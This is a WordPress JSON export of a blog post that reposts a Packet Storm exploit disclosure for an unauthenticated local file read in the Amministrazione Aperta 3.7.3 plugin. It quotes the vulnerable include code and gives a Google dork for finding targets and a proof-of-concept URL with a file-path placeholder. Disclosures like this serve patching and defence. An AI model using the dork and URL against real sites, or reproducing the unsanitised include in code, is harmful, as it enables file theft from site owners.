{"id":22086,"date":"2022-03-23T21:19:30","date_gmt":"2022-03-23T17:19:30","guid":{"rendered":"https:\/\/packetstormsecurity.com\/files\/166407\/wpaae373-fileread.txt"},"modified":"2022-03-27T09:38:41","modified_gmt":"2022-03-27T05:08:41","slug":"wordpress-amministrazione-aperta-3-7-3-arbitrary-file-read","status":"publish","type":"post","link":"https:\/\/afaghhosting.net\/blog\/wordpress-amministrazione-aperta-3-7-3-arbitrary-file-read\/","title":{"rendered":"WordPress Amministrazione Aperta 3.7.3 Arbitrary File Read"},"content":{"rendered":"<dl id=\"F166407\" class=\"file first\">\n<dt dir=\"ltr\"><a class=\"ico text-plain\" title=\"Size: 0.8 KB\" href=\"https:\/\/packetstormsecurity.com\/files\/download\/166407\/wpaae373-fileread.txt\" target=\"_blank\" rel=\"noopener\"><strong>WordPress Amministrazione Aperta 3.7.3 Arbitrary File Read<\/strong><\/a><\/dt>\n<dd class=\"datetime\" dir=\"ltr\">Posted <a title=\"15:50:03 UTC\" href=\"https:\/\/packetstormsecurity.com\/files\/date\/2022-03-23\/\" target=\"_blank\" rel=\"noopener\">Mar 23, 2022<\/a><\/dd>\n<dd class=\"refer\" dir=\"ltr\">Authored by <a class=\"person\" href=\"https:\/\/packetstormsecurity.com\/files\/author\/16236\/\" target=\"_blank\" rel=\"noopener\">Hassan Khan Yusufzai<\/a><\/dd>\n<dd class=\"detail\" dir=\"ltr\">WordPress Amministrazione Aperta plugin version 3.7.3 suffers from an arbitrary file read vulnerability.<\/dd>\n<dd class=\"tags\" dir=\"ltr\">tags | <a href=\"https:\/\/packetstormsecurity.com\/files\/tags\/exploit\" target=\"_blank\" rel=\"noopener\">exploit<\/a>, <a href=\"https:\/\/packetstormsecurity.com\/files\/tags\/arbitrary\" target=\"_blank\" rel=\"noopener\">arbitrary<\/a><\/dd>\n<dd class=\"md5\" dir=\"ltr\">MD5 | <code>8dd07978b438f1e9484ef164f2dc5d93<\/code><\/dd>\n<dd class=\"act-links\" dir=\"ltr\"><a title=\"Size: 0.8 KB\" href=\"https:\/\/packetstormsecurity.com\/files\/download\/166407\/wpaae373-fileread.txt\" rel=\"nofollow noopener\" target=\"_blank\">Download<\/a> | <a class=\"fav\" href=\"https:\/\/packetstormsecurity.com\/files\/favorite\/166407\/\" rel=\"nofollow noopener\" target=\"_blank\">Favorite<\/a> | <a href=\"https:\/\/packetstormsecurity.com\/files\/166407\/WordPress-Amministrazione-Aperta-3.7.3-Arbitrary-File-Read.html\" target=\"_blank\" rel=\"noopener\">View<\/a><\/dd>\n<\/dl>\n<div class=\"src\" dir=\"ltr\">\n<pre><code># Exploit Title: WordPress Plugin amministrazione-aperta 3.7.3 - Local File Read - Unauthenticated\r\n# Google Dork: inurl:\/wp-content\/plugins\/amministrazione-aperta\/\r\n# Date: 23-03-2022\r\n# Exploit Author: Hassan Khan Yusufzai - Splint3r7\r\n# Vendor Homepage: https:\/\/wordpress.org\/plugins\/amministrazione-aperta\/\r\n# Version: 3.7.3\r\n# Tested on: Firefox<\/code><\/pre>\n<p># Vulnerable File: dispatcher.php<\/p>\n<pre><code><\/code><\/pre>\n<p># Vulnerable Code:<\/p>\n<pre><code><\/code><\/pre>\n<p>&#8220;`<br \/>\nif ( isset($_GET[&#8216;open&#8217;]) ) {<br \/>\ninclude(ABSPATH . &#8216;wp-content\/plugins\/&#8217;.$_GET[&#8216;open&#8217;]);<br \/>\n} else {<br \/>\necho &#8216;<br \/>\n&lt;div id=&#8221;welcome-panel&#8221; class=&#8221;welcome-panel&#8221;<br \/>\nstyle=&#8221;padding-bottom: 20px;&#8221;&gt;<br \/>\n&lt;div class=&#8221;welcome-panel-column-container&#8221;&gt;&#8217;;<\/p>\n<pre><code><\/code><\/pre>\n<p>include_once( ABSPATH . WPINC . &#8216;\/feed.php&#8217; );<br \/>\n&#8220;`<\/p>\n<pre><code><\/code><\/pre>\n<p># Proof of Concept:<\/p>\n<pre><code><\/code><\/pre>\n<p>localhost\/wp-content\/plugins\/amministrazione-aperta\/wpgov\/dispatcher.php?open=[LFI]\n<pre><code><\/code><\/pre>\n<p>&nbsp;<\/p>\n<pre><code><\/code><\/pre>\n<\/div>\n","protected":false},"excerpt":{"rendered":"<p>WordPress Amministrazione Aperta 3.7.3 Arbitrary File Read Posted Mar 23, 2022 Authored by Hassan Khan Yusufzai WordPress Amministrazione Aperta plugin version 3.7.3 suffers from an arbitrary file read vulnerability. tags | exploit, arbitrary MD5 | 8dd07978b438f1e9484ef164f2dc5d93 Download | Favorite | View # Exploit Title: WordPress Plugin amministrazione-aperta 3.7.3 &#8211; Local File Read &#8211; Unauthenticated # &hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-22086","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/22086","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=22086"}],"version-history":[{"count":0,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/22086\/revisions"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=22086"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=22086"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=22086"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}